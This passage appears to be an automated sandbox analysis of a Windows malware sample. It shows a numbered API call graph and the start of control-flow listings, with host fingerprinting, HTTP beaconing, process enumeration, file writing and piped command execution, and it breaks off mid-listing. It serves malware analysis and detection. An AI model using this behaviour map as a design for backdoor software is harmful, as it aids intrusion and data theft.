3837 2be5ba7 3839 2bec704 NtDelayExecution 3874 2be5c2f new[] 3839->3874 3841 2be82b4 NtFreeVirtualMemory 3841->3862 3842 2be6404 wsprintfA 3842->3874 3843 2be6025 wsprintfA 3843->3862 3844 2be5f36 wsprintfA 3844->3862 3845 2bebfc0 NtAllocateVirtualMemory 3845->3862 3847 2be82b4 NtFreeVirtualMemory 3847->3862 3848 2bebe64 3 API calls 3848->3862 3850 2beb388 NtAllocateVirtualMemory 3850->3862 3851 2beb388 NtAllocateVirtualMemory 3853 2be6187 WideCharToMultiByte 3851->3853 3852 2beb388 NtAllocateVirtualMemory 3855 2be6243 WideCharToMultiByte 3852->3855 3856 2bebe64 3 API calls 3853->3856 3854 2beb388 NtAllocateVirtualMemory 3857 2be62ff WideCharToMultiByte 3854->3857 3858 2bebe64 3 API calls 3855->3858 3856->3874 3859 2bebe64 3 API calls 3857->3859 3858->3874 3859->3874 3861 2be82b4 NtFreeVirtualMemory 3861->3862 3862->3837 3862->3845 3862->3848 3862->3850 3862->3861 3862->3874 3875 2be5484 3862->3875 3886 2be8424 3862->3886 3912 2beb770 3862->3912 3920 2be6fc0 3862->3920 3924 2be4e28 3862->3924 3941 2be8bdc 3862->3941 3864 2be8bdc 3 API calls 3864->3874 3865 2be69a2 GetExitCodeThread 3865->3874 3867 2be69de GetExitCodeThread 3867->3874 3868 2beb388 NtAllocateVirtualMemory 3868->3874 3870 2bebe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3870->3874 3871 2be6fc0 NtAllocateVirtualMemory 3871->3874 3872 2bebfc0 NtAllocateVirtualMemory 3872->3874 3873 2be82b4 NtFreeVirtualMemory 3873->3874 3874->3839 3874->3841 3874->3842 3874->3843 3874->3844 3874->3847 3874->3851 3874->3852 3874->3854 3874->3862 3874->3864 3874->3865 3874->3867 3874->3868 3874->3870 3874->3871 3874->3872 3874->3873 3947 2be6cfc 3874->3947 3951 2be5734 3874->3951 3876 2be54bc 3875->3876 3877 2beb388 NtAllocateVirtualMemory 3876->3877 3878 2be54e2 3877->3878 3879 2beb388 NtAllocateVirtualMemory 3878->3879 3880 2be54f8 InternetCrackUrlA 3879->3880 3881 2be5554 3880->3881 3882 2be556e 3880->3882 3883 2be82b4 NtFreeVirtualMemory 3881->3883 3882->3862 3884 2be5561 3883->3884 3885 2be82b4 NtFreeVirtualMemory 3884->3885 3885->3882 3887 2beb388 NtAllocateVirtualMemory 3886->3887 3888 2be8452 3887->3888 3889 2be845f 3888->3889 3890 2be8466 GetAdaptersInfo 3888->3890 3889->3862 3891 2be848d 3890->3891 3909 2be865b 3890->3909 3892 2beb388 NtAllocateVirtualMemory 3891->3892 3894 2be8498 GetAdaptersInfo 3892->3894 3893 2be8688 3896 2beb388 NtAllocateVirtualMemory 3893->3896 3897 2be84c5 3894->3897 3895 2be82b4 NtFreeVirtualMemory 3895->3893 3898 2be869b 3896->3898 3903 2be84e6 wsprintfA 3897->3903 3898->3889 3899 2be86ac GetComputerNameExA 3898->3899 3900 2be8729 GetComputerNameExA 3899->3900 3905 2be86c5 3899->3905 3901 2be87db 3900->3901 3902 2be8746 3900->3902 3904 2be82b4 NtFreeVirtualMemory 3901->3904 3907 2be87a6 wsprintfA 3902->3907 3910 2be8502 3903->3910 3904->3889 3906 2be86fa wsprintfA 3905->3906 3906->3900 3907->3901 3908 2be8627 wsprintfA 3908->3909 3908->3910 3909->3893 3909->3895 3910->3908 3910->3909 3911 2be85b2 wsprintfA 3910->3911 3911->3910 3914 2beb7aa 3912->3914 3913 2beb7b5 3913->3874 3914->3913 3916 2beb7f0 3914->3916 3961 2bec00c 3914->3961 3917 2bec00c NtAllocateVirtualMemory 3916->3917 3918 2beb822 3916->3918 3917->3918 3918->3913 3919 2bec00c NtAllocateVirtualMemory 3918->3919 3919->3913 3921 2be6fd5 3920->3921 3923 2be6fe6 3920->3923 3922 2beb388 NtAllocateVirtualMemory 3921->3922 3921->3923 3922->3923 3923->3862 3926 2be4e5d 3924->3926 3925 2be5484 3 API calls 3925->3926 3926->3925 3928 2be4ec6 3926->3928 3930 2be4fc6 3926->3930 3937 2be82b4 NtFreeVirtualMemory 3926->3937 3938 2be5022 3926->3938 3964 2be5078 3926->3964 3969 2be5160 3926->3969 3927 2be4d78 InternetOpenW InternetConnectA 3927->3928 3928->3926 3928->3927 3929 2bebfc0 NtAllocateVirtualMemory 3928->3929 3928->3930 3936 2be82b4 NtFreeVirtualMemory 3928->3936 3929->3928 3931 2be504c InternetCloseHandle 3930->3931 3932 2be5057 3930->3932 3931->3932 3934 2be505f InternetCloseHandle 3932->3934 3935 2be506a 3932->3935 3934->3935 3935->3874 3936->3928 3937->3926 3938->3930 3940->3836 3942 2beb470 3941->3942 3943 2be8bef GetCursorPos 3942->3943 3944 2be8bfe 3943->3944 3945 2be8c02 GetTickCount 3943->3945 3944->3862 3993 2beb620 RtlRandom 3945->3993 3948 2be6d12 3947->3948 3949 2beb388 NtAllocateVirtualMemory 3948->3949 3950 2be6d2f 3948->3950 3949->3950 3950->3874 3952 2be5792 3951->3952 3953 2bebfc0 NtAllocateVirtualMemory 3952->3953 3959 2be57b3 3953->3959 3954 2be57c0 3954->3874 3956 2be5a49 3957 2be82b4 NtFreeVirtualMemory 3956->3957 3957->3954 3959->3954 3959->3956 3994 2becf4c 3959->3994 4000 2becde8 3959->4000 4010 2be44c8 3959->4010 3962 2beb388 NtAllocateVirtualMemory 3961->3962 3963 2bec034 3962->3963 3963->3916 3965 2be50bc InternetReadFile 3964->3965 3966 2be5104 3965->3966 3968 2be50de 3965->3968 3966->3928 3967 2beb704 3 API calls 3967->3968 3968->3965 3968->3966 3968->3967 3970 2beb388 NtAllocateVirtualMemory 3969->3970 3971 2be51ab 3970->3971 3972 2bebe64 3 API calls 3971->3972 3974 2be5204 3972->3974 3973 2be5265 3975 2be5315 3973->3975 3977 2be5292 3973->3977 3974->3973 3976 2bebe64 3 API calls 3974->3976 3978 2be5350 HttpOpenRequestA 3975->3978 3979 2be5253 3976->3979 3980 2be52c7 HttpOpenRequestA 3977->3980 3981 2be539c 3978->3981 3979->3973 3982 2bebe64 3 API calls 3979->3982 3980->3981 3983 2be53d6 3981->3983 3984 2be53b3 InternetSetOptionA 3981->3984 3990 2be53a4 3981->3990 3982->3973 3985 2be5424 HttpSendRequestA 3983->3985 3989 2be53e0 3983->3989 3984->3983 3988 2be5443 3985->3988 3986 2be82b4 NtFreeVirtualMemory 3987 2be5479 3986->3987 3987->3926 3988->3990 3991 2be82b4 NtFreeVirtualMemory 3988->3991 3992 2be53fb HttpSendRequestA 3989->3992 3990->3986 3990->3987 3991->3990 3992->3988 3993->3944 3995 2becf5a 3994->3995 3999 2becf5c 3994->3999 3995->3959 3996 2becfaa 3998 2be82b4 NtFreeVirtualMemory 3996->3998 3997 2be82b4 NtFreeVirtualMemory 3997->3999 3998->3995 3999->3996 3999->3997 4001 2bece04 4000->4001 4002 2beb388 NtAllocateVirtualMemory 4001->4002 4003 2bece3b 4001->4003 4004 2bece6b 4002->4004 4003->3959 4004->4003 4005 2bebfc0 NtAllocateVirtualMemory 4004->4005 4006 2bece9d 4005->4006 4007 2beb388 NtAllocateVirtualMemory 4006->4007 4008 2becebc 4007->4008 4008->4003 4009 2be82b4 NtFreeVirtualMemory 4008->4009 4009->4003 4013 2be44ec 4010->4013 4011 2be4799 4014 2be47a4 4011->4014 4015 2be4852 4011->4015 4012 2be47e3 4016 2be47ee 4012->4016 4017 2be4900 4012->4017 4013->4011 4013->4012 4018 2be47af 4014->4018 4019 2be494c 4014->4019 4028 2bebfc0 NtAllocateVirtualMemory 4015->4028 4029 2be480f 4016->4029 4030 2be49ec 4016->4030 4032 2be47de 4016->4032 4073 2be4334 4017->4073 4021 2be47ba 4018->4021 4022 2be4931 4018->4022 4127 2be2b28 4019->4127 4025 2be47c5 4021->4025 4026 2be4942 4021->4026 4094 2be2d50 CreateToolhelp32Snapshot 4022->4094 4024 2be4905 4024->4032 4078 2bec704 NtDelayExecution 4024->4078 4033 2be483e 4025->4033 4034 2be47cc 4025->4034 4126 2be321c CreateThread 4026->4126 4046 2be4870 4028->4046 4036 2be481a 4029->4036 4037 2be49f8 4029->4037 4147 2be7dfc 4030->4147 4032->3959 4061 2be7940 4033->4061 4040 2be491d 4034->4040 4041 2be47d7 4034->4041 4036->4032 4171 2be4a20 4036->4171 4037->4032 4158 2be7f54 4037->4158 4079 2be7768 4040->4079 4041->4032 4048 2be7c98 4041->4048 4046->4032 4047 2be82b4 NtFreeVirtualMemory 4046->4047 4047->4032 4049 2be7cb7 4048->4049 4050 2be7cc4 MultiByteToWideChar 4049->4050 4179 2be7a84 4050->4179 4053 2be7ddf 4054 2be82b4 NtFreeVirtualMemory 4053->4054 4060 2be7dd8 4053->4060 4054->4060 4055 2be7d4b VirtualAlloc 4056 2be7d7e 4055->4056 4057 2beb388 NtAllocateVirtualMemory 4056->4057 4058 2be7d88 CreateThread 4057->4058 4059 2be82b4 NtFreeVirtualMemory 4058->4059 4059->4060 4060->4032 4268 2be830c 4061->4268 4063 2be7970 4063->4032 4064 2be7963 4064->4063 4065 2be8bdc 3 API calls 4064->4065 4066 2be79ba wsprintfW 4065->4066 4067 2be82b4 NtFreeVirtualMemory 4066->4067 4068 2be79df 4067->4068 4069 2be7a07 MultiByteToWideChar 4068->4069 4070 2be7a84 21 API calls 4069->4070 4071 2be7a4f 4070->4071 4071->4063 4276 2beb8d4 4071->4276 4074 2be434a SetEvent 4073->4074 4075 2be4357 4073->4075 4074->4075 4076 2be437b 4075->4076 4077 2be4361 ReleaseMutex CloseHandle 4075->4077 4076->4024 4077->4076 4078->4024 4080 2be77a7 4079->4080 4081 2be830c 4 API calls 4080->4081 4083 2be77d3 4081->4083 4082 2be77e0 4082->4032 4083->4082 4084 2be8bdc 3 API calls 4083->4084 4085 2be782a wsprintfW 4084->4085 4086 2be82b4 NtFreeVirtualMemory 4085->4086 4087 2be784f 4086->4087 4088 2be7874 MultiByteToWideChar 4087->4088 4089 2be7a84 21 API calls 4088->4089 4090 2be78b9 4089->4090 4091 2be78d9 MultiByteToWideChar 4090->4091 4091->4082 4092 2be790d 4091->4092 4092->4082 4281 2beb9a0 4092->4281 4095 2beb388 NtAllocateVirtualMemory 4094->4095 4096 2be2d94 4095->4096 4097 2bebe64 3 API calls 4096->4097 4098 2be2ddd 4097->4098 4099 2be31fb 4098->4099 4100 2be2de9 Process32First 4098->4100 4101 2bebe64 3 API calls 4099->4101 4102 2be2e34 4100->4102 4103 2be2e13 Process32Next 4100->4103 4104 2be320c 4101->4104 4105 2beb388 NtAllocateVirtualMemory 4102->4105 4103->4102 4103->4103 4104->4032 4106 2be2e44 Process32First 4105->4106 4107 2be2ead Process32First 4106->4107 4108 2be2e60 4106->4108 4110 2be31e6 4107->4110 4115 2be2ec8 4107->4115 4109 2be2e68 Process32Next 4108->4109 4109->4107 4109->4109 4111 2be82b4 NtFreeVirtualMemory 4110->4111 4112 2be31f0 CloseHandle 4111->4112 4112->4099 4113 2be31cb Process32Next 4113->4110 4113->4115 4114 2bebe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4114->4115 4115->4113 4115->4114 4116 2be2fe0 wsprintfA 4115->4116 4117 2bebe64 3 API calls 4116->4117 4119 2be300d 4117->4119 4118 2bebe64 3 API calls 4118->4119 4119->4118 4120 2be3086 wsprintfA 4119->4120 4121 2bebe64 3 API calls 4120->4121 4124 2be30b3 4121->4124 4123 2bebe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4123->4124 4124->4123 4125 2bebe64 3 API calls 4124->4125 4290 2be260c CreateToolhelp32Snapshot 4124->4290 4125->4113 4126->4032 4128 2beb388 NtAllocateVirtualMemory 4127->4128 4129 2be2b3b 4128->4129 4130 2bebe64 3 API calls 4129->4130 4131 2be2b7b 4130->4131 4306 2be8398 4131->4306 4133 2be2cf3 4134 2be82b4 NtFreeVirtualMemory 4133->4134 4136 2be2d05 4133->4136 4134->4136 4135 2be2b8e 4135->4133 4137 2bebe64 3 API calls 4135->4137 4138 2bebe64 3 API calls 4136->4138 4139 2be2bda FindFirstFileA 4137->4139 4140 2be2d40 4138->4140 4139->4133 4146 2be2bfe 4139->4146 4140->4032 4141 2be2ccd FindNextFileA 4142 2be2ce8 FindClose 4141->4142 4141->4146 4142->4133 4143 2bebe64 3 API calls 4143->4146 4144 2be2c98 wsprintfA 4145 2bebe64 3 API calls 4144->4145 4145->4146 4146->4141 4146->4143 4146->4144 4148 2be7e17 4147->4148 4149 2be7e24 MultiByteToWideChar 4148->4149 4150 2be7a84 21 API calls 4149->4150 4152 2be7e75 4150->4152 4151 2be7f40 4151->4032 4152->4151 4153 2beb388 NtAllocateVirtualMemory 4152->4153 4154 2be7eb6 4153->4154 4155 2beb388 NtAllocateVirtualMemory 4154->4155 4156 2be7ed9 CreateThread 4155->4156 4157 2be82b4 NtFreeVirtualMemory 4156->4157 4157->4151 4159 2be7f6f 4158->4159 4160 2be7f7c MultiByteToWideChar 4159->4160 4161 2be7a84 21 API calls 4160->4161 4162 2be7fcd 4161->4162 4163 2beb388 NtAllocateVirtualMemory 4162->4163 4170 2be80a4 4162->4170 4164 2be800e 4163->4164 4314 2bec7dc 4164->4314 4167 2beb388 NtAllocateVirtualMemory 4168 2be803d CreateThread 4167->4168 4169 2be82b4 NtFreeVirtualMemory 4168->4169 4169->4170 4170->4032 4175 2be4a2c 4171->4175 4172 2be4aec MultiByteToWideChar 4173 2be830c 4 API calls 4172->4173 4173->4175 4174 2be4b7d MultiByteToWideChar 4174->4175 4175->4172 4175->4174 4176 2be4bd6 wsprintfW 4175->4176 4178 2be4acc 4175->4178 4177 2be7a84 21 API calls 4176->4177 4177->4175 4178->4032 4182 2be7ac4 4179->4182 4181 2be7c5d 4184 2be7c68 4181->4184 4185 2be82b4 NtFreeVirtualMemory 4181->4185 4186 2bec00c NtAllocateVirtualMemory 4182->4186 4187 2be7b28 4182->4187 4190 2be900c 4182->4190 4210 2be76d8 4182->4210 4222 2be8240 4182->4222 4183 2be82b4 NtFreeVirtualMemory 4183->4181 4184->4053 4184->4055 4185->4184 4186->4182 4187->4181 4187->4183 4191 2be904b InternetOpenW 4190->4191 4192 2be908b 4191->4192 4193 2be9086 4191->4193 4228 2be55dc 4192->4228 4195 2be923d InternetCloseHandle 4193->4195 4196 2be9248 4193->4196 4195->4196 4198 2be925b 4196->4198 4199 2be9250 InternetCloseHandle 4196->4199 4198->4182 4199->4198 4200 2be90f4 4202 2be9106 4200->4202 4203 2be82b4 NtFreeVirtualMemory 4200->4203 4204 2be9118 InternetOpenUrlW 4202->4204 4205 2be82b4 NtFreeVirtualMemory 4202->4205 4203->4202 4204->4193 4207 2be9154 4204->4207 4205->4204 4206 2be915f InternetReadFile 4206->4207 4207->4193 4207->4206 4208 2beb648 3 API calls 4207->4208 4209 2beb388 NtAllocateVirtualMemory 4207->4209 4208->4207 4209->4207 4250 2be92f8 4210->4250 4215 2be774e 4218 2be82b4 NtFreeVirtualMemory 4215->4218 4221 2be76fb 4215->4221 4216 2bebf78 3 API calls 4217 2be7729 4216->4217 4217->4215 4219 2be772d 4217->4219 4218->4221 4220 2be82b4 NtFreeVirtualMemory 4219->4220 4220->4221 4221->4182 4262 2be80b8 4222->4262 4225 2be827f 4225->4182 4229 2be5614 4228->4229 4230 2beb388 NtAllocateVirtualMemory 4229->4230 4231 2be563a 4230->4231 4232 2beb388 NtAllocateVirtualMemory 4231->4232 4233 2be5650 InternetCrackUrlW 4232->4233 4234 2be56ac 4233->4234 4235 2be56c6 4233->4235 4236 2be82b4 NtFreeVirtualMemory 4234->4236 4235->4193 4235->4200 4239 2bec860 4235->4239 4237 2be56b9 4236->4237 4238 2be82b4 NtFreeVirtualMemory 4237->4238 4238->4235 4240 2bec894 InternetConnectW 4239->4240 4245 2bec8df 4239->4245 4241 2bec8e4 HttpOpenRequestW 4240->4241 4240->4245 4244 2bec936 HttpSendRequestW 4241->4244 4241->4245 4242 2bec9d5 InternetCloseHandle 4243 2bec9e0 4242->4243 4246 2bec9e8 InternetCloseHandle 4243->4246 4247 2bec9f3 4243->4247 4248 2bec9a7 HttpSendRequestW 4244->4248 4249 2bec955 InternetQueryOptionW InternetSetOptionW 4244->4249 4245->4242 4245->4243 4246->4247 4247->4200 4248->4245 4249->4248 4251 2bec00c NtAllocateVirtualMemory 4250->4251 4253 2be9318 4251->4253 4252 2be76f7 4252->4221 4255 2bebf78 4252->4255 4253->4252 4254 2be82b4 NtFreeVirtualMemory 4253->4254 4254->4252 4256 2bebf90 4255->4256 4259 2bebf0c 4256->4259 4258 2be7713 4258->4215 4258->4216 4260 2beb704 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4259->4260 4261 2bebf40 4260->4261 4261->4258 4263 2be80f9 4262->4263 4264 2be810b RtlInitUnicodeString NtCreateFile 4263->4264 4265 2be81b1 4264->4265 4265->4225 4266 2be81c8 NtWriteFile 4265->4266 4267 2be8230 NtClose 4266->4267 4267->4225 4269 2beb470 4268->4269 4270 2be8326 SHGetFolderPathW 4269->4270 4271 2be834f 4270->4271 4272 2bec00c NtAllocateVirtualMemory 4271->4272 4274 2be835b 4272->4274 4273 2be8368 4273->4064 4274->4273 4275 2bebf78 3 API calls 4274->4275 4275->4273 4277 2beb8ee 4276->4277 4278 2beb926 CreateProcessW 4277->4278 4279 2beb97a CloseHandle CloseHandle 4278->4279 4280 2beb976 4278->4280 4279->4280 4280->4063 4282 2beb9c0 4281->4282 4283 2beba1e 4282->4283 4284 2beba78 4282->4284 4285 2beba53 wsprintfW 4283->4285 4286 2bebaad wsprintfW 4284->4286 4287 2bebac8 CreateProcessW 4285->4287 4286->4287 4288 2bebb1f CloseHandle CloseHandle 4287->4288 4289 2bebb1b 4287->4289 4288->4289 4289->4082 4291 2be297e 4290->4291 4292 2be2659 Process32First 4290->4292 4291->4124 4292->4291 4295 2be267f 4292->4295 4293 2be2963 Process32Next 4293->4291 4293->4295 4294 2bebe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4294->4295 4295->4293 4295->4294 4296 2be279f wsprintfA 4295->4296 4297 2bebe64 3 API calls 4296->4297 4299 2be27cf 4297->4299 4298 2bebe64 3 API calls 4298->4299 4299->4298 4300 2be2839 wsprintfA 4299->4300 4301 2bebe64 3 API calls 4300->4301 4304 2be2869 4301->4304 4302 2be260c 3 API calls 4302->4304 4303 2bebe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4303->4304 4304->4302 4304->4303 4305 2bebe64 3 API calls 4304->4305 4305->4293 4307 2beb470 4306->4307 4308 2be83b2 SHGetFolderPathA 4307->4308 4309 2be83db 4308->4309 4310 2bebfc0 NtAllocateVirtualMemory 4309->4310 4311 2be83e7 4310->4311 4312 2be83f4 4311->4312 4313 2bebe64 3 API calls 4311->4313 4312->4135 4313->4312 4315 2bec7ef 4314->4315 4316 2be8033 4314->4316 4317 2beb388 NtAllocateVirtualMemory 4315->4317 4316->4167 4317->4316 4319 2be4411 4318->4319 4320 2bebfc0 NtAllocateVirtualMemory 4319->4320 4324 2be4444 4320->4324 4321 2be4451 4322 2be44a4 4323 2be82b4 NtFreeVirtualMemory 4322->4323 4323->4321 4324->4321 4324->4322 4325 2be448f MessageBoxA 4324->4325 4325->4322 4335 2be4384 4336 2be43a7 4335->4336 4337 2be43a5 4335->4337 4338 2be43c4 129 API calls 4336->4338 4338->4337 4391 2be3304 4392 2be3349 4391->4392 4451 2be3322 4391->4451 4393 2beb388 NtAllocateVirtualMemory 4392->4393 4394 2be3353 4393->4394 4394->4451 4509 2be2164 4394->4509 4396 2be3406 4397 2be2164 21 API calls 4396->4397 4398 2be349e 4397->4398 4399 2be2164 21 API calls 4398->4399 4400 2be3537 4399->4400 4401 2be2164 21 API calls 4400->4401 4402 2be35d0 4401->4402 4403 2be2164 21 API calls 4402->4403 4404 2be3669 4403->4404 4405 2be2164 21 API calls 4404->4405 4406 2be3702 4405->4406 4407 2be2164 21 API calls 4406->4407 4408 2be379b 4407->4408 4409 2be2164 21 API calls 4408->4409 4410 2be3834 4409->4410 4411 2be2164 21 API calls 4410->4411 4412 2be38cd 4411->4412 4413 2be2164 21 API calls 4412->4413 4414 2be3966 4413->4414 4415 2be2164 21 API calls 4414->4415 4416 2be39ff 4415->4416 4417 2beb388 NtAllocateVirtualMemory 4416->4417 4418 2be3a12 4417->4418 4419 2be3ad6 4418->4419 4420 2be6fc0 NtAllocateVirtualMemory 4418->4420 4418->4451 4421 2be6fc0 NtAllocateVirtualMemory 4419->4421 4422 2be3b77 4419->4422 4429 2be3a63 4420->4429 4431 2be3b04 4421->4431 4423 2be3c18 4422->4423 4424 2be6fc0 NtAllocateVirtualMemory 4422->4424 4425 2be6fc0 NtAllocateVirtualMemory 4423->4425 4426 2be3cb9 4423->4426 4434 2be3ba5 4424->4434 4439 2be3c46 4425->4439 4427 2be3d5a 4426->4427 4428 2be6fc0 NtAllocateVirtualMemory 4426->4428 4430 2be3dfb 4427->4430 4432 2be6fc0 NtAllocateVirtualMemory 4427->4432 4442 2be3ce7 4428->4442 4429->4419 4438 2bebe64 3 API calls 4429->4438 4433 2be6fc0 NtAllocateVirtualMemory 4430->4433 4435 2be3e9c 4430->4435 4431->4422 4446 2bebe64 3 API calls 4431->4446 4453 2be3d88 4432->4453 4456 2be3e29 4433->4456 4434->4423 4449 2bebe64 3 API calls 4434->4449 4436 2be3f3d 4435->4436 4440 2be6fc0 NtAllocateVirtualMemory 4435->4440 4441 2be6fc0 NtAllocateVirtualMemory 4436->4441 4445 2be3fde 4436->4445 4437 2be4138 4531 2be2988 4437->4531 4443 2be3abd 4438->4443 4439->4426 4454 2bebe64 3 API calls 4439->4454 4460 2be3eca 4440->4460 4469 2be3f6b 4441->4469 4442->4427 4463 2bebe64 3 API calls 4442->4463 4450 2bebe64 3 API calls 4443->4450 4448 2be408b 4445->4448 4452 2be6fc0 NtAllocateVirtualMemory 4445->4452 4447 2be3b5e 4446->4447 4455 2bebe64 3 API calls 4447->4455 4448->4437 4457 2be6fc0 NtAllocateVirtualMemory 4448->4457 4458 2be3bff 4449->4458 4459 2be3acc 4450->4459 4472 2be400c 4452->4472 4453->4430 4466 2bebe64 3 API calls 4453->4466 4461 2be3ca0 4454->4461 4462 2be3b6d 4455->4462 4456->4435 4475 2bebe64 3 API calls 4456->4475 4481 2be40b9 4457->4481 4464 2bebe64 3 API calls 4458->4464 4465 2be82b4 NtFreeVirtualMemory 4459->4465 4460->4436 4478 2bebe64 3 API calls 4460->4478 4467 2bebe64 3 API calls 4461->4467 4468 2be82b4 NtFreeVirtualMemory 4462->4468 4470 2be3d41 4463->4470 4471 2be3c0e 4464->4471 4465->4419 4473 2be3de2 4466->4473 4474 2be3caf 4467->4474 4468->4422 4469->4445 4486 2bebe64 3 API calls 4469->4486 4476 2bebe64 3 API calls 4470->4476 4477 2be82b4 NtFreeVirtualMemory 4471->4477 4472->4448 4489 2bebe64 3 API calls 4472->4489 4479 2bebe64 3 API calls 4473->4479 4480 2be82b4 NtFreeVirtualMemory 4474->4480 4482 2be3e83 4475->4482 4483 2be3d50 4476->4483 4477->4423 4484 2be3f24 4478->4484 4485 2be3df1 4479->4485 4480->4426 4481->4437 4496 2bebe64 3 API calls 4481->4496 4487 2bebe64 3 API calls 4482->4487 4488 2be82b4 NtFreeVirtualMemory 4483->4488 4490 2bebe64 3 API calls 4484->4490 4491 2be82b4 NtFreeVirtualMemory 4485->4491 4492 2be3fc5 4486->4492 4493 2be3e92 4487->4493 4488->4427 4494 2be406c 4489->4494 4495 2be3f33 4490->4495 4491->4430 4497 2bebe64 3 API calls 4492->4497 4498 2be82b4 NtFreeVirtualMemory 4493->4498 4499 2bebe64 3 API calls 4494->4499 4500 2be82b4 NtFreeVirtualMemory 4495->4500 4501 2be4119 4496->4501 4502 2be3fd4 4497->4502 4498->4435 4503 2be407e 4499->4503 4500->4436 4504 2bebe64 3 API calls 4501->4504 4505 2be82b4 NtFreeVirtualMemory 4502->4505 4506 2be82b4 NtFreeVirtualMemory 4503->4506 4507 2be412b 4504->4507 4505->4445 4506->4448 4508 2be82b4 NtFreeVirtualMemory 4507->4508 4508->4437 4510 2be21e4 4509->4510 4511 2be21f6 6 API calls 4510->4511 4557 2be2134 4511->4557 4513 2be2333 CreateProcessW 4514 2beb388 NtAllocateVirtualMemory 4513->4514 4515 2be2399 4514->4515 4516 2beb388 NtAllocateVirtualMemory 4515->4516 4517 2be23d6 4516->4517 4518 2be25e8 4517->4518 4519 2be25a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4517->4519 4520 2be2401 PeekNamedPipe 4517->4520 4523 2be24b9 PeekNamedPipe 4517->4523 4524 2be2569 GetExitCodeProcess 4517->4524 4527 2be2468 ReadFile 4517->4527 4529 2be2518 ReadFile 4517->4529 4558 2bec704 NtDelayExecution 4517->4558 4521 2be25fa 4518->4521 4522 2be82b4 NtFreeVirtualMemory 4518->4522 4519->4518 4520->4517 4520->4523 4521->4396 4522->4521 4523->4517 4523->4524 4524->4517 4525 2be258f 4524->4525 4525->4519 4528 2bebe64 3 API calls 4527->4528 4528->4523 4530 2bebe64 3 API calls 4529->4530 4530->4524 4532 2be299d 4531->4532 4533 2be2b17 4531->4533 4532->4533 4534 2be29ca 4532->4534 4535 2be82b4 NtFreeVirtualMemory 4532->4535 4533->4451 4536 2be29ea 4534->4536 4537 2be82b4 NtFreeVirtualMemory 4534->4537 4535->4534 4538 2be2a0a 4536->4538 4539 2be82b4 NtFreeVirtualMemory 4536->4539 4537->4536 4540 2be2a2a 4538->4540 4542 2be82b4 NtFreeVirtualMemory 4538->4542 4539->4538 4541 2be2a4a 4540->4541 4543 2be82b4 NtFreeVirtualMemory 4540->4543 4544 2be2a6a 4541->4544 4545 2be82b4 NtFreeVirtualMemory 4541->4545 4542->4540 4543->4541 4546 2be2a8a 4544->4546 4547 2be82b4 NtFreeVirtualMemory 4544->4547 4545->4544 4548 2be2aaa 4546->4548 4549 2be82b4 NtFreeVirtualMemory 4546->4549 4547->4546 4550 2be2aca 4548->4550 4551 2be82b4 NtFreeVirtualMemory 4548->4551 4549->4548 4552 2be2aea 4550->4552 4553 2be82b4 NtFreeVirtualMemory 4550->4553 4551->4550 4554 2be2b0a 4552->4554 4555 2be82b4 NtFreeVirtualMemory 4552->4555 4553->4552 4556 2be82b4 NtFreeVirtualMemory 4554->4556 4555->4554 4556->4533 4557->4513 4558->4517 4594 2bebb44 4595 2bebb62 4594->4595 4598 2bebbc5 4594->4598 4596 2bebb8e CreateFileMappingA 4595->4596 4597 2bebbcc MapViewOfFile 4596->4597 4596->4598 4597->4598 4600 2bebbff 4597->4600 4599 2bebcd5 VirtualFree 4601 2be82b4 NtFreeVirtualMemory 4599->4601 4600->4599 4602 2beb388 NtAllocateVirtualMemory 4600->4602 4603 2bebd06 UnmapViewOfFile CloseHandle 4601->4603 4604 2bebc35 4602->4604 4603->4598 4605 2bebe64 3 API calls 4604->4605 4606 2bebc87 4605->4606 4607 2bebe64 3 API calls 4606->4607 4608 2bebc99 4607->4608 4609 2bebfc0 NtAllocateVirtualMemory 4608->4609 4610 2bebcaf 4609->4610 4611 2be82b4 NtFreeVirtualMemory 4610->4611 4612 2bebccb 4611->4612 4613 2be82b4 NtFreeVirtualMemory 4612->4613 4613->4599 4339 2bec5c0 4340 2bec5de 4339->4340 4343 2bec641 4339->4343 4341 2bec60a CreateFileMappingA 4340->4341 4342 2bec648 MapViewOfFile 4341->4342 4341->4343 4342->4343 4344 2bec67b 4342->4344 4349 2beca9c 4344->4349 4347 2be82b4 NtFreeVirtualMemory 4348 2bec6d1 UnmapViewOfFile CloseHandle 4347->4348 4348->4343 4350 2becaad 4349->4350 4351 2bec6a0 VirtualFree 4349->4351 4355 2beca68 4350->4355 4351->4347 4354 2be82b4 NtFreeVirtualMemory 4354->4351 4356 2beca7d 4355->4356 4357 2beca8b 4355->4357 4358 2beca68 NtFreeVirtualMemory 4356->4358 4359 2be82b4 NtFreeVirtualMemory 4357->4359 4358->4357 4360 2beca95 4359->4360 4360->4354

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 02BE8424 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 0 2be8424-2be845d call 2beb388 3 2be845f-2be8461 0->3 4 2be8466-2be8487 GetAdaptersInfo 0->4 5 2be87ea-2be87f1 3->5 6 2be848d-2be84c0 call 2beb388 GetAdaptersInfo call 2beb4cc 4->6 7 2be8676-2be867c 4->7 16 2be84c5-2be84c8 6->16 9 2be867e-2be8683 call 2be82b4 7->9 10 2be8688-2be86a6 call 2beb388 7->10 9->10 17 2be86ac-2be86c3 GetComputerNameExA 10->17 18 2be87e5 10->18 19 2be84ca-2be84d7 16->19 20 2be84d9-2be84e1 16->20 21 2be8729-2be8740 GetComputerNameExA 17->21 22 2be86c5-2be86dc call 2beb4cc 17->22 18->5 25 2be84e6-2be84fe wsprintfA 19->25 20->25 23 2be87db-2be87e0 call 2be82b4 21->23 24 2be8746-2be874b 21->24 34 2be86de-2be86eb 22->34 35 2be86ed-2be86f5 22->35 23->18 27 2be875c-2be8763 24->27 28 2be874d-2be875a 24->28 29 2be8502-2be850a 25->29 32 2be876b-2be8782 call 2beb4cc 27->32 28->32 33 2be8516-2be8525 29->33 45 2be8796-2be879e 32->45 46 2be8784-2be8794 32->46 37 2be852b-2be8530 33->37 38 2be85f2-2be8609 call 